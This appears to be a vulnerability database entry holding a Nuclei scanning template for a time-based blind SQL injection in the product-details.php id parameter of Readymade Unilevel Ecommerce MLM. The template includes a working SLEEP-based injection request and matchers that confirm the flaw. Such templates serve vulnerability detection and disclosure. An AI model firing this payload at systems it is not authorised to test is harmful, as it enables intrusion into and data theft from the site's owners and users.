漏洞描述
Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
readymade-unilevel-sqli: Readymade Unilevel Ecommerce MLM - SQL Injection
PoC代码[已公开]
id: readymade-unilevel-sqli
info:
name: Readymade Unilevel Ecommerce MLM - SQL Injection
author: s4e-io
severity: high
description: |
Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
reference:
- https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
metadata:
vendor: i-netsolution
product: readymade-unilevel-ecommerce
tags: time-based-sqli,ecommerce,readymade,sqli,vuln
http:
- raw:
- |
@timeout 30s
GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 200"
- 'contains(content_type,"text/html")'
- 'contains_all(body, "user_login_id", "Products</a>")'
condition: and
# digest: 4a0a0047304502205f9a1a36adef7dcc1ef0319114e65cdabbc2d3f484d51a941b216b50a68b0b8302210099012276310298d0eab4b636a4c154fe85151b2548c84957ffa83bc65e5e8383:922c64590222798bb761d5b6d8e72950